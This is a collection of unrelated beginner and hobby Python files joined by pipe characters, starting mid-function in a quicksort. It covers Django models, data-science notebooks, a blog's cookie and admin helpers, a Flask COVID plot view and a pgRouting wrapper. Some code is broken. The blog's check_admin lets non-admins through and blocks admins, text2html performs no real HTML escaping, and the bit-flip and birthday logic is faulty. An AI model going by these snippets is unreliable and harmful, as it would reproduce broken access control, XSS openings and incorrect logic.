while l < r:
while l < r and nums[r] >= pivot:
r -= 1
nums[l] = nums[r]
while l < r and nums[l] <= pivot:
l+=1
nums[r]=nums[l]
nums[l] = pivot
return l
print(quicksort([5,2,3,25,89,-3,1,7],0,7)) |
from PyQt5.QtWidgets import QPushButton
from pandas_profiling.report.presentation.core.sample import Sample
class QtSample(Sample):
def render(self):
return QPushButton(self.content["name"])
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-11 14:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('studentspot', '0004_auto_20180109_2342'),
]
operations = [
migrations.CreateModel(
name='House',
fields=[
('houseName', models.CharField(default='house', max_length=50, primary_key=True, serialize=False)),
('inmate1', models.CharField(default='empty', max_length=20)),
('inmate2', models.CharField(default='empty', max_length=20)),
('inmate3', models.CharField(default='empty', max_length=20)),
('inmate4', models.CharField(default='empty', max_length=20)),
('inmate5', models.CharField(default='empty', max_length=20)),
('inmate6', models.CharField(default='empty', max_length=20)),
('inmate7', models.CharField(default='empty', max_length=20)),
('inmate8', models.CharField(default='empty', max_length=20)),
('inmate9', models.CharField(default='empty', max_length=20)),
('inmate10', models.CharField(default='empty', max_length=20)),
('inmate11', models.CharField(default='empty', max_length=20)),
('inmate12', models.CharField(default='empty', max_length=20)),
('inmate13', models.CharField(default='empty', max_length=20)),
('inmate14', models.CharField(default='empty', max_length=20)),
('inmate15', models.CharField(default='empty', max_length=20)),
('inmate16', models.CharField(default='empty', max_length=20)),
('inmate17', models.CharField(default='empty', max_length=20)),
('inmate18', models.CharField(default='empty', max_length=20)),
('inmate19', models.CharField(default='empty', max_length=20)),
('inmate20', models.CharField(default='empty', max_length=20)),
],
),
]
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[3]:
df = pd.read_csv(r"C:\Users\SAI\Downloads\Survey_Resp.csv")
# In[5]:
df.head() # print first 5 rows of data set
# In[7]:
df.shape #no.of rows & columns in the given data set
# In[8]:
a = df.tail(4) # Assigned last 4 rows of dataset through tail to variable a
# In[9]:
a # printing the values that are passed into a
# In[10]:
df.columns
# In[18]:
pd.unique(df['COUNTRY_CODE']) # printing all the Unique values of the column COUNTRY_CODE to a list
pd.unique(df['COUNTRY_CODE'].tolist()) # this command this all the below diplayed values as list
# In[16]:
numOfRows = len(df.index) # displaying row count of dataframe by finding the length of index labels
print (numOfRows)
# In[22]:
# display the values of the First column that has country code as US
RespVal = df[df['COUNTRY_CODE'] == 'US']
RespVal['RESP_ID']
# In[ ]:
|
import warnings
import numpy as np
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from keras.models import Sequential
from keras.layers import Dense
from keras.callbacks import TensorBoard
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score
#ignorowanie warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
warnings.simplefilter(action='ignore', category=DeprecationWarning)
#inicjalizacja dataset iris
iris = load_iris()
X = iris['data']
y = iris['target']
names = iris['target_names']
feature_names = iris['feature_names']
#zamiana kodowania z "labelowego" na one hot - wartosc 1 dla pozycji wartosci, w przeciwnym wypadku 0
oh_enc = OneHotEncoder()
Y = oh_enc.fit_transform(y[:, np.newaxis]).toarray()
#normalizacja wartosci - wartosci w dataset maja teraz (na potrzeby NN) wartosc z zakresu 0-1,
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
#podział dataset na zbior do trenowania i na zbior do weryfikacji treningu
X_train, X_test, Y_train, Y_test = train_test_split(X_scaled, Y, test_size=0.5, random_state=2)
n_features = X.shape[1]
n_classes = Y.shape[1]
#funkcja odpowiedzialna za tworzenie modelu
def create_custom_model(input_dim, output_dim, nodes, n=1, name='model'):
def create_model():
#deklaracja "miejsca na warstwy NN"
model = Sequential(name=name)
for i in range(n):
#dodawanie warstwy do modelu, z funkcja atkywacji relu
model.add(Dense(nodes, input_dim=input_dim, activation='relu'))
#dodawanie warstwy wyjsciowej, funkcja aktywacji softmax
model.add(Dense(output_dim, activation='softmax'))
#kompilacja modelu z danymi parametrami
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
return model
return create_model
#utworzenie modelu z n warstwami
models = [create_custom_model(n_features, n_classes, 8, i, 'model_{}'.format(i))
for i in range(1, 4)]
#info o modelu
for create_model in models:
create_model().summary()
#miejsce na callbacks
cb_dict = {}
#callback - klasa "kontrolująca" proces treningu
cb = TensorBoard()
for create_model in models:
model = create_model()
print('Model No.:', model.name)
history_callback = model.fit(X_train, Y_train,batch_size=5,epochs=50,verbose=0,validation_data=(X_test, Y_test),callbacks=[cb])
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test: POMYLKA:', score[0])
print('Test: DOKLADNOSC:', score[1])
cb_dict[model.name] = [history_callback, model]
#funkcja do tworzenia modelu - wymagana przez KerasClassifier
custom_model_1 = create_custom_model(n_features, n_classes, 8, 3)
#tworzenie modelu NN
kearas_model_1 = KerasClassifier(build_fn=custom_model_1, epochs=100, batch_size=5, verbose=0)
#"wynik" NN uzyskany poprzez cross validation
scores = cross_val_score(kearas_model_1, X_scaled, Y, cv=10)
print("DOKLADNOSC : {:0.2f} (+/- {:0.2f})".format(scores.mean(), scores.std())) |
class Solution:
def minKBitFlips(self, a: 'List[int]', k: 'int') -> 'int':
if k==1:
return len(a) - sum(a)
l = len(a)
count = 0
i=0
while i<(l-k+1):
if a[i] == 0:
while i<l and i<(i+k):
a[i] = a[i]^1
i+=1
count += 1
else:
i+=1
for i in range(l-k, l):
if a[i] == 0:
return -1
return count
inp,k = [1,1,0], 2
inp,k = [0,1,0], 1
inp,k = [0,0,0,0],3
inp,k = [0],2
inp,k = [0,0,0,1,0,1,1,0],3
print(Solution().minKBitFlips(inp,k))
|
from config import configs
import re, time, json, logging, hashlib, base64, asyncio
import markdown2
from aiohttp import web
from coroweb import get, post
from apis import APIValueError,APIResourceNotFoundError,APIError,APIPermissionError
from model import User,Comment, Blog, next_id
# COOKIE_NAME = 'awesession'
COOKIE_KEY = configs.session.secret
def text2html(text):
lines = map(lambda s: '<p>%s</p>' % s.replace('&', '&').replace('<', '<').replace('>', '>'), filter(lambda s: s.strip() != '', text.split('\n')))
return ''.join(lines)
def check_admin(request):
if request.__user__ is None or not request.__user__.admin:
return
raise APIPermissionError()
def get_page_index(page_str):
p = 1
try:
p = int(page_str)
except ValueError as e:
pass
if p<1:
p =1
return p
def user2cookie(user,max_age):
expires = str(int(time.time()+max_age))
s = '%s-%s-%s-%s' %(user.id,user.passwd,expires,COOKIE_KEY)
L =[user.id,expires,hashlib.sha1(s.encode('utf-8')).hexdigest()]
return '-'.join(L)
@asyncio.coroutine
def cookie2user(cookie_str):
if not cookie_str:
return None
try:
L = cookie_str.split('-')
if len(L)!=3:
return None
uid,expires,sha1 =L
if int(expires)<time.time():
return None
user_arr = yield from User.findAll('id=?',[uid])
if user_arr is None:
return None
user = user_arr[0]
s = '%s-%s-%s-%s' %(user.id,user.passwd,expires,COOKIE_KEY)
if sha1 != hashlib.sha1(s.encode('utf-8')).hexdigest():
logging.info('invalid sha1...')
return None
user.passwd = '******'
return user
except Exception as e:
logging.exception(e)
return None |
words = 'stars glitter turquoise violet buttercup venus diamonds sparkles horoscope'.split()
import random
random.shuffle(words)
random_word = words.pop()
for i in range(8):
random.shuffle(words)
random_word = words.pop()
print(random_word)
|
def demo1():
num = 10
print("demo1的内部变量是 %d" % num)
def demo2():
# print("%d" % num)
pass
demo1()
demo2()
|
from data import question_data
from question_model import question
from quiz_brain import QuizBrain
question_bank = []
for q in question_data:
ques_text = q["text"]
ques_answer = q["answer"]
new_question = question(ques_text, ques_answer)
question_bank.append(new_question)
quiz = QuizBrain(question_bank)
while quiz.still_has_questions() == True:
quiz.new_question()
print("You've completed the quiz !!! Congratulations !!!")
print(f"Your final score was {quiz.score}/ {quiz.question_number}")
|
# Joshua Chan
# 1588459
# Birthday Calculator
current_day = int(input('What is the calendar day?'))
current_month = int(input('What is the current month?'))
current_year = int(input('What is the current year?'))
# The three prompts above will collect the current date
birth_day = int(input('What day is your birthday?'))
birth_month = int(input('What month is your birthday?'))
birth_year = int(input('What year were you born?'))
# The three prompts above will collect the user's birthday
user_age = current_year - birth_year
if current_month > birth_month:
print('You are', user_age, 'years old.')
if current_month < birth_month:
print('You are', user_age - 1, 'years old.')
# Above will calculate the user's age
if current_day == birth_day and current_month == birth_month:
print('Happy Birthday!')
print('You are', user_age, 'years old.')
# Above will check if the current date is the user's birthday
|
import collections
import math
from collections import Counter
from scipy import stats
def entropy1():
s=range(0,256)
# calculate probability for each byte as number of occurrences / array length
probabilities = [n_x/len(s) for x,n_x in collections.Counter(s).items()]
# [0.00390625, 0.00390625, 0.00390625, ...]
# calculate per-character entropy fractions
e_x = [-p_x*math.log(p_x,2) for p_x in probabilities]
# [0.03125, 0.03125, 0.03125, ...]
# sum fractions to obtain Shannon entropy
entropy = sum(e_x)
print(entropy)
# entropy1()
def entropy2():
labels = [0.9, 0.09, 0.1]
x = stats.entropy(list(Counter(labels).keys()), base=2)
print(x)
entropy2() |
import unittest
from main import sum
class TestMain(unittest.TestCase):
def test__sum(self):
test_set = [(1, 2), (2, 3), (2, 0)]
ans = [3, 5, 2]
actual = []
for test in test_set:
actual.append(sum(test[0], test[1]))
self.assertEqual(actual, ans)
|
money = float(input())
gender = input()
age = int(input())
sport = input()
gim = {
'm' :{'Gym' : 42, 'Boxing' : 41, 'Yoga' : 45, 'Zumba' : 34, 'Dances' : 51, 'Pilates' : 39},
'f' :{'Gym' : 35, 'Boxing' : 37, 'Yoga' : 42, 'Zumba' : 31, 'Dances' : 53, 'Pilates' : 37}
}
subtotal = gim[gender][sport]
if age <= 19:
subtotal = subtotal * 0.80
total = abs(money - subtotal)
if money >= subtotal:
print(f'You purchased a 1 month pass for {sport}.')
else:
print(f'You don\'t have enough money! You need ${total:.2f} more.') |
import operator
def insertion_sort(list_data):
# print('Insertion! on:{} '.format(sortby_order))
for i in range(1, len(list_data)):
# Check to exchange to the left until it inserts
while i > 0:
# Get the pair
insert_val = list_data[i]
prev_val = list_data[i - 1]
# If smaller than left, exchange places
if float(insert_val) <= float(prev_val):
# prev_val, insert_val = insert_val, prev_val
list_data[i - 1], list_data[i] = list_data[i], list_data[i - 1]
i -= 1
return list_data
|
import os
import sys
import json
userHome = os.path.expanduser('~')
config_name = 'config.json'
config_template = {
"directories": {
"bookmarksRootDir": os.path.join(userHome, 'Desktop', 'bookmarksBackups'),
"chromeJSON": os.path.join("chrome_json"),
"chromeMD": os.path.join("chrome_md"),
"firefoxJson": os.path.join(
userHome, "Library/Application Support/Google/Chrome/Default/Bookmarks"),
"mobileLinksDir": "mobileLinks",
},
"filenames": {
"chr_md_file_prefix": "chrome.md"
},
"markdownFormat": "standard"
}
def write_config_file(new_filename):
with open(new_filename, 'w') as new_file:
new_file.write(
json.dumps(config_template, indent=4)
)
print('File successfully written:', new_filename)
def file_exists(filePath):
if os.path.exists(filePath):
raise OSError(filePath + ' file exists.')
def main():
config_main_directory = os.path.join('..', config_name)
file_exists(config_main_directory)
write_config_file(config_main_directory)
if __name__ == "__main__":
main()
|
import unittest
class BaseTest(unittest.TestCase):
"""
Place holder for code shared among all the tests
"""
pass
|
job_id = 0
class Job:
def __init__(self, country, name="contruction", money=1):
global job_id
self.country = country
self.name = name
self.money = money
self.id = job_id
job_id += 1
self.worker = None
def to_json(self):
return {
"id": self.id,
"name": self.name,
"money": self.money
}
|
import os.path
import neat
import numpy as np
from neat_gym_exp import NEATGymExperiment
import roboschool
import matplotlib.pyplot as plt
from OpenGL import GLU
import gym.envs.registration as reg
from mikobot import MiKoBot
reg.register("MiKo-v1", reward_threshold=2500, entry_point=MiKoBot, max_episode_steps=1000,
tags={"pg_complexity": 8000000})
def int_a(a):
return np.array(a)
def fitness(rec):
f = rec['reward'].sum(axis=1).mean()
return f
# Load configuration
config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
os.path.join(os.path.dirname(__file__), 'config-miko'))
# Construct experiment
exp = NEATGymExperiment('MiKo-v1', config,
interpret_action=int_a,
runs_per_genome=2,
extract_fitness=fitness,
mode='parallel',
instances=7,
# render_all=True,
# network=neat.nn.GRUNetwork,
# starting_gen=0
)
exp.exp_info(True)
winner = exp.run()
plt.plot(range(len(exp.f_record)), exp.f_record)
plt.ylabel('Fitness')
plt.xlabel('Generation')
plt.xlim(0, len(exp.f_record))
plt.xticks(range(0, len(exp.f_record), len(exp.f_record) // 10))
plt.show()
exp.test(winner)
|
#!/usr/bin/env python3
# coding: utf-8
import json
from datetime import datetime
from os import path
from types import SimpleNamespace
from flask import render_template, Blueprint
from flask import request
from process_procedures import process, preprocess
import hashlib
# basedir = '.'
basedir = '/var/www/html/covid/'
countries_file = path.join(basedir, 'data/countries_params.json')
covid_service = Blueprint('covid_service', __name__, template_folder='templates')
base_path = path.join(basedir, 'COVID-19/data')
cases_file = "cases_time.csv"
cases_today_file = "cases_country.csv"
with open(countries_file, 'r', encoding='utf-8') as f:
countries_data = json.load(f)
all_countries = [el[0] for el in sorted(countries_data.items(), key=lambda x: x[1]['country_ru'])]
w_pos = all_countries.index('World')
all_countries.insert(0, all_countries.pop(w_pos))
r_pos = all_countries.index('Russia')
all_countries.insert(1, all_countries.pop(r_pos))
d_pos = all_countries.index('Diamond Princess')
all_countries.insert(len(all_countries), all_countries.pop(d_pos))
d_pos = all_countries.index('MS Zaandam')
all_countries.insert(len(all_countries), all_countries.pop(d_pos))
@covid_service.route('/', methods=['GET', 'POST'])
def show_plot():
chosen_countries = []
log = True
daily = True
nonabs = False
deaths = True
current_day = False
from_date = "2020-03-01"
forec_confirmed = []
forec_deaths = []
if request.method == 'POST':
chosen_countries = request.form.getlist('country')
log = request.form.get('log')
daily = request.form.get('daily')
nonabs = request.form.get('nonabs')
deaths = request.form.get('deaths')
current_day = request.form.get('current_day')
from_date = request.form.get('from_date')
forec_confirmed_checked = request.form.get('forec-confirmed')
forec_deaths_checked = request.form.get('forec-deaths')
if forec_confirmed_checked:
forec_confirmed_func = request.form.get('confirmed_function')
forec_confirmed.append(forec_confirmed_func)
forec_confirmed.append(request.form.get('for_period_confirmed'))
forec_confirmed.append(request.form.get('on_period_confirmed'))
if forec_deaths_checked:
forec_deaths_func = request.form.get('deaths_function')
forec_deaths.append(forec_deaths_func)
forec_deaths.append(request.form.get('for_period_deaths'))
forec_deaths.append(request.form.get('on_period_deaths'))
nonlog = False
if not log:
nonlog = True
if set(chosen_countries) - set(all_countries):
return render_template("covid.html", error="Выберите страны из списка!",
countries=all_countries, countries_data=countries_data)
args = SimpleNamespace(deaths=deaths, list=False, current_day=current_day,
from_date=from_date, nonlog=nonlog,
regions=chosen_countries,
forec_confirmed=forec_confirmed, forec_deaths=forec_deaths,
forec_current_day=[], nonabs=nonabs, daily=daily)
cases, cases_today = preprocess(args, base_path, cases_file, cases_today_file)
# Creating unique filename for the plot
params = '_'.join([str(getattr(args, i)) for i in vars(args)])
params = params + datetime.now().strftime('%Y-%m-%d-%H')
m = hashlib.md5()
name = params.encode('ascii', 'backslashreplace')
m.update(name)
fname = m.hexdigest()
out_image = fname + '.png'
imagepath = path.join(basedir, 'data', out_image)
if not path.isfile(imagepath):
_ = process(args, cases, cases_today, countries_data,
plot_file_name=imagepath, use_agg=True)
return render_template("covid.html", image=out_image, countries=all_countries,
countries_data=countries_data,
chosen_countries=chosen_countries,
log=log, deaths=deaths, current_day=current_day,
from_date=from_date,
forec_confirmed=forec_confirmed, forec_deaths=forec_deaths,
nonabs=nonabs, daily=daily)
else:
return render_template("covid.html", countries=all_countries,
countries_data=countries_data,
chosen_countries=chosen_countries, log=log, deaths=deaths,
current_day=current_day, from_date=from_date,
forec_confirmed=forec_confirmed, forec_deaths=forec_deaths,
nonabs=nonabs, daily=daily)
|
import cv2
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from PIL import Image
import PIL.ImageOps
import os,ssl,time
X,y = fetch_openml('mnist_784',version = 1,return_X_y = True)
xtrain,xtest,ytrain,ytest = train_test_split(X,y,random_state = 9,train_size = 7500,test_size = 2500)
xtrainscale = xtrain/255
xtestscale = xtest/255
clf = LogisticRegression(solver='saga',multi_class='multinomial').fit(xtrainscale,ytrain)
def getprediction(image):
Image_PIL = Image.open(image)
image_bw = Image_PIL.convert('L')
image_bw_resize = image_bw.resize((28,28),Image.ANTIALIAS)
#image_bw_resize_inverter = PIL.ImageOps.invert(image_bw_resize)
pixel_filter = 20
min_pixel = np.percentile(image_bw_resize,pixel_filter)
image_bw_resize_inverter_scale = np.clip(image_bw_resize-min_pixel,0,255)
max_pixel = np.max(image_bw_resize)
image_bw_resize_inverter_scale = np.asarray(image_bw_resize_inverter_scale)/max_pixel
test_sample = np.array(image_bw_resize_inverter_scale).reshape(1,784)
test_prediction = clf.predict(test_sample)
return test_prediction[0] |
import sys
import os
import csv
import cPickle as pickle
import glob
import numpy as np
import pandas as pd
from features import extract_features, extract_features2, get_all_features
def load_model(model_dir, verbose=True):
with open(model_dir, 'rb') as fi:
m = pickle.load(fi)
return m
def parse_dataframe(df):
parse_cell = lambda cell: np.fromstring(cell, dtype=np.float, sep=" ")
df = df.applymap(parse_cell)
return df
def read_data(filename_pairs, filename_info, symmetrize=True):
df_pairs = parse_dataframe(pd.read_csv(filename_pairs, index_col="SampleID"))
df_info = pd.read_csv(filename_info, index_col="SampleID")
features = pd.concat([df_pairs, df_info], axis=1)
if symmetrize:
features_inverse = features.copy()
features_inverse['A'] = features['B']
features_inverse['A type'] = features['B type']
features_inverse['B'] = features['A']
features_inverse['B type'] = features['A type']
original_index = np.array(zip(features.index, features.index)).flatten()
features = pd.concat([features, features_inverse])
features.index = range(0,len(features),2)+range(1,len(features),2)
features.sort(inplace=True)
features.index = original_index
features.index.name = "SampleID"
return features
def symmetrize_features(ori_features, features, feature_def=None):
ori_features_inverse = ori_features.copy()
ori_features_inverse['A'] = ori_features['B']
ori_features_inverse['A type'] = ori_features['B type']
ori_features_inverse['B'] = ori_features['A']
ori_features_inverse['B type'] = ori_features['A type']
features_inverse = extract_features2(ori_features_inverse, features, feature_def)
original_index = np.array(zip(features.index, features.index)).flatten()
features = pd.concat([features, features_inverse])
features.index = range(0,len(features),2)+range(1,len(features),2)
features.sort(inplace=True)
features.index = original_index
features.index.name = "SampleID"
return features
def write_predictions(pred_dir, test, predictions):
writer = csv.writer(open(pred_dir, "w"), lineterminator="\n")
rows = [x for x in zip(test.index, predictions)]
writer.writerow(("SampleID", "Target"))
writer.writerows(rows)
def main():
if len(sys.argv) < 3:
print "USAGE: python predict.py input_dir output_dir"
return -1
input_dir = sys.argv[1]
output_dir = sys.argv[2]
symmetrize = True
# Get the file names
filename_pairs = glob.glob(os.path.join(input_dir, '*_pairs.csv'))
if len(filename_pairs)!=1:
print('No or multiple pairs.csv files')
exit(1)
filename_pairs = filename_pairs[0]
filename_info = glob.glob(os.path.join(input_dir, '*_publicinfo.csv'))
if len(filename_info)!=1:
print('No or multiple publicinfo.scv files')
exit(1)
filename_info = filename_info[0]
basename = filename_pairs[:-filename_pairs[::-1].index('_')-1]
if filename_info[:-filename_info[::-1].index('_')-1] != basename:
print('Different basenames in publicinfo.csv and pairs.csv files')
exit(1)
# Remove the path name
try:
dataset = basename[-basename[::-1].index(os.sep):]
except:
dataset = basename
test_ori = read_data(filename_pairs, filename_info, False)
print "Loading the classifier"
prog_dir = os.path.dirname(os.path.abspath(__file__))
amodel = load_model(os.path.join(prog_dir, 'models', "model2.pkl"))
if symmetrize:
ccmodel = load_model(os.path.join(prog_dir, 'models', "ccmodel.pkl"))
cnmodel = load_model(os.path.join(prog_dir, 'models', "cnmodel.pkl"))
nnmodel = load_model(os.path.join(prog_dir, 'models', "nnmodel.pkl"))
else:
for m in amodel.systems:
m.symmetrize = symmetrize
mymodel = load_model(os.path.join(prog_dir, 'models', "model_t.pkl"))
mymodel.weights = [0.17275686, 0.1424602, 0.14824986, 0.45374324, 0.08278984]
mymodel.weights = np.array(mymodel.weights) / sum(mymodel.weights)
print "Extracting features"
all_features_clean, used_feature_names = get_all_features()
test = extract_features(test_ori, all_features_clean)
test = symmetrize_features(test_ori, test, all_features_clean)
test = test[['A type', 'B type'] + list(used_feature_names)]
print "Making predictions"
aptest = amodel.predict(test)
myptest = mymodel.predict(test)
if symmetrize:
BINARY = 0 #"Binary"
CATEGORICAL = 1 #"Categorical"
NUMERICAL = 2 #"Numerical"
ccfilter = ((test['A type'] != NUMERICAL) & (test['B type'] != NUMERICAL))
cnfilter = ((test['A type'] != NUMERICAL) & (test['B type'] == NUMERICAL))
ncfilter = ((test['A type'] == NUMERICAL) & (test['B type'] != NUMERICAL))
nnfilter = ((test['A type'] == NUMERICAL) & (test['B type'] == NUMERICAL))
ptest = np.zeros((4,test.shape[0]))
ccptest = ccmodel.predict(test[ccfilter])
cnptest = cnmodel.predict(test[cnfilter])
nnptest = nnmodel.predict(test[nnfilter])
ptest[0, ccfilter] = ccptest
ptest[0, cnfilter] = cnptest
ptest[0, ncfilter] = -cnptest
ptest[1, nnfilter] = nnptest
ptest[2, :] = aptest
ptest[3, :] = myptest
wopt = [0.80, 1.00, 1.75, 1.75]
print 'wopt = ', wopt
predictions = np.dot(wopt, ptest)
else:
predictions = aptest
output_filename = dataset + "_predict.csv"
print("Writing predictions to " + output_filename)
submission_dir = os.path.join(output_dir, output_filename)
if symmetrize:
write_predictions(submission_dir, test[0::2], predictions[0::2])
else:
write_predictions(submission_dir, test, predictions)
if __name__=="__main__":
main()
|
import time
import uuid
import ujson
from wallace.db.base.attrs.base import DataType
class Boolean(DataType):
cast = bool
default = False
@classmethod
def typecast(cls, inst, val):
if isinstance(val, basestring):
return val == 'True' or val == 'true' or val == 't'
return super(Boolean, cls).typecast(inst, val)
class ByteArray(DataType):
cast = bytearray
class Float(DataType):
cast = float
default = 0.0
class Integer(DataType):
cast = int
default = 0
class Moment(Integer):
default = None
class Now(Moment):
default = lambda: int(time.time())
class String(DataType):
cast = str
class Unicode(DataType):
cast = unicode
@classmethod
def typecast(cls, inst, val):
try:
val = cls.cast(val)
except UnicodeDecodeError:
val = val.decode('utf-8')
return super(Unicode, cls).typecast(inst, val)
class JSON(String):
def __get__(self, inst, owner):
serialized = super(JSON, self).__get__(inst, owner)
return ujson.loads(serialized) if serialized else serialized
@classmethod
def typecast(cls, inst, val):
if val and isinstance(val, basestring):
try:
val = ujson.loads(val)
except TypeError:
if inst._cbs_is_db_data_inbound:
raise
val = ujson.dumps(val) if val else val
return super(JSON, cls).typecast(inst, val)
def is_uuid(val):
try:
uuid.UUID(val)
except ValueError:
return False
return True
def is_uuid4(val):
try:
val = uuid.UUID(val)
except ValueError:
return False
return val.version == 4
class UUID(String):
validators = (is_uuid,)
@classmethod
def typecast(cls, inst, val):
if isinstance(val, uuid.UUID):
val = val.hex
else:
val = uuid.UUID(val).hex
return super(UUID, cls).typecast(inst, val)
class UUID4(UUID):
validators = (is_uuid4,)
|
#!/usr/bin/env python
#
# Yang Liu (gloolar@gmail.com)
# 2016-08
#
# TODO
# - Node range check
# - Thinking about PgrNode as key: format node lat, lon precision?
import psycopg2
import psycopg2.extras
from collections import namedtuple
# from pprint import pprint
__all__ = ['PgrNode', 'PGRouting']
PgrNode = namedtuple('PgrNode', ['id', 'lon', 'lat'])
class PGRouting(object):
"""Computing shortest paths and costs from nodes to nodes represented in
geographic coordinates, by wrapping pgRouting.
"""
__conn = None
__cur = None
# default edge table defination
__meta_data = {
'table': 'ways',
'id': 'gid',
'source': 'source',
'target': 'target',
'cost': 'cost_s', # driving time in second
'reverse_cost': 'reverse_cost_s', # reverse driving time in second
'x1': 'x1',
'y1': 'y1',
'x2': 'x2',
'y2': 'y2',
'geometry': 'the_geom',
'has_reverse_cost': True,
'directed': True,
'srid': 4326
}
def __init__(self, database, user, host='localhost', port='5432'):
self.__connect_to_db(database, user, host, port)
def __del__(self):
self.__close_db()
def __connect_to_db(self, database, user, host, port):
if self.__cur is not None and not self.__cur.closed:
self.__cur.close()
if self.__conn is not None and not self.__conn.closed:
self.__conn.close()
try:
self.__conn = psycopg2.connect(database=database, user=user,
host=host, port=port)
self.__cur = self.__conn.cursor(
cursor_factory= psycopg2.extras.DictCursor)
except psycopg2.Error as e:
print(e.pgerror)
def __close_db(self):
if not self.__cur.closed:
self.__cur.close()
if not self.__conn.closed:
self.__conn.close()
def __find_nearest_vertices(self, nodes):
"""Find nearest vertex of nodes on the way.
Args:
nodes: list of PgrNode.
Returns:
list of PgrNode.
"""
sql = """
SELECT id, lon::double precision, lat::double precision
FROM {table}_vertices_pgr
ORDER BY the_geom <-> ST_SetSRID(ST_Point(%s,%s),{srid})
LIMIT 1
""".format(table=self.__meta_data['table'],
srid=self.__meta_data['srid'])
output = []
for node in nodes:
try:
self.__cur.execute(sql, (node.lon, node.lat))
results = self.__cur.fetchall()
if len(results) > 0:
output.append(PgrNode(results[0]['id'],
results[0]['lon'],
results[0]['lat']))
else:
print('cannot find nearest vid for ({}, {})'.format(
node[0], node[1]))
return None
except psycopg2.Error as e:
print(e.pgerror)
return None
return output
def __node_distance(self, node1, node2):
"""Get distance between two nodes (unit: m).
"""
sql = """
SELECT ST_Distance(
ST_GeogFromText('SRID={srid};POINT({lon1} {lat1})'),
ST_GeogFromText('SRID={srid};POINT({lon2} {lat2})')
);
""".format(srid=self.__meta_data['srid'],
lon1=node1.lon, lat1=node1.lat,
lon2=node2.lon, lat2=node2.lat)
try:
self.__cur.execute(sql)
results = self.__cur.fetchall()
return results[0][0]
except psycopg2.Error as e:
print(e.pgerror)
return None
def set_meta_data(self, **kwargs):
"""Set meta data of tables if it is different from the default.
"""
for k, v in kwargs.items():
if not k in self.__meta_data.keys():
print("WARNNING: set_meta_data: invaid key {}".format(k))
continue
if not isinstance(v, (str, bool, int)):
print("WARNNING: set_meta_data: invalid value {}".format(v))
continue
self.__meta_data[k] = v
return self.__meta_data
def dijkstra_cost(self, start_vids, end_vids):
"""Get all-pairs costs among way nodes without paths using
pgr_dijkstraCost function.
"""
sql = """
SELECT *
FROM pgr_dijkstraCost(
'SELECT {id} as id,
{source} as source,
{target} as target,
{cost} as cost,
{reverse_cost} as reverse_cost
FROM {table}',
%s,
%s,
{directed})
""".format(
table = self.__meta_data['table'],
id = self.__meta_data['id'],
source = self.__meta_data['source'],
target = self.__meta_data['target'],
cost = self.__meta_data['cost'],
reverse_cost = self.__meta_data['reverse_cost'],
directed = 'TRUE'
if self.__meta_data['directed']
else 'FALSE')
try:
self.__cur.execute(sql, (start_vids, end_vids))
results = self.__cur.fetchall()
return {(r['start_vid'], r['end_vid']) :
r['agg_cost'] for r in results}
except psycopg2.Error as e:
print(e.pgerror)
return {}
def dijkstra(self, start_vids, end_vids):
"""Get all-pairs shortest paths with costs among way nodes using
pgr_dijkstra function.
"""
sql = """
SELECT *, v.lon::double precision, v.lat::double precision
FROM
pgr_dijkstra(
'SELECT {id} as id,
{source} as source,
{target} as target,
{cost} as cost,
{reverse_cost} as reverse_cost
FROM {edge_table}',
%s,
%s,
{directed}) as r,
{edge_table}_vertices_pgr as v
WHERE r.node=v.id
ORDER BY r.seq;
""".format(
edge_table = self.__meta_data['table'],
id = self.__meta_data['id'],
source = self.__meta_data['source'],
target = self.__meta_data['target'],
cost = self.__meta_data['cost'],
reverse_cost = self.__meta_data['reverse_cost'],
directed = 'TRUE'
if self.__meta_data['directed']
else 'FALSE')
try:
self.__cur.execute(sql, (start_vids, end_vids))
results = self.__cur.fetchall()
output = {}
for r in results:
# print r
key = (r['start_vid'], r['end_vid'])
if output.get(key, None) is None:
output[key] = {'path': [], 'cost': -1}
output[key]['path'].append(
PgrNode(r['node'], r['lon'], r['lat']))
if r['edge'] < 0:
output[key]['cost'] = r['agg_cost']
return output
except psycopg2.Error as e:
print(e.pgerror)
return {}
def astar(self, start_vid, end_vid):
"""Get one-to-one shortest path between way nodes using pgr_AStar
function.
"""
sql = """
SELECT *, v.lon::double precision, v.lat::double precision
FROM
pgr_AStar(
'SELECT {id}::INTEGER as id,
{source}::INTEGER as source,
{target}::INTEGER as target,
{cost} as cost,
{x1} as x1,
{y1} as y1,
{x2} as x2,
{y2} as y2
{reverse_cost}
FROM {edge_table}',
%s,
%s,
{directed},
{has_rcost}) as r,
{edge_table}_vertices_pgr as v
WHERE r.id1=v.id
ORDER BY r.seq;
""".format(
edge_table=self.__meta_data['table'],
id = self.__meta_data['id'],
source = self.__meta_data['source'],
target = self.__meta_data['target'],
cost = self.__meta_data['cost'],
x1 = self.__meta_data['x1'],
y1 = self.__meta_data['y1'],
x2 = self.__meta_data['x2'],
y2 = self.__meta_data['y2'],
reverse_cost = ', {} as reverse_cost'.format(
self.__meta_data['reverse_cost'])
if self.__meta_data['directed'] and
self.__meta_data['has_reverse_cost']
else '',
directed = 'TRUE'if self.__meta_data['directed'] else 'FALSE',
has_rcost = 'TRUE'
if self.__meta_data['directed'] and
self.__meta_data['has_reverse_cost']
else 'FALSE')
# print(sql)
try:
self.__cur.execute(sql, (start_vid, end_vid))
results = self.__cur.fetchall()
output = {}
key = (start_vid, end_vid)
for r in results:
# print r
if output.get(key, None) is None:
output[key] = {'path': [], 'cost': 0}
output[key]['path'].append(PgrNode(r['id1'], r['lon'], r['lat']))
if r['id2'] > 0:
output[key]['cost'] += r['cost']
return output
except psycopg2.Error as e:
print(e.pgerror)
return {}
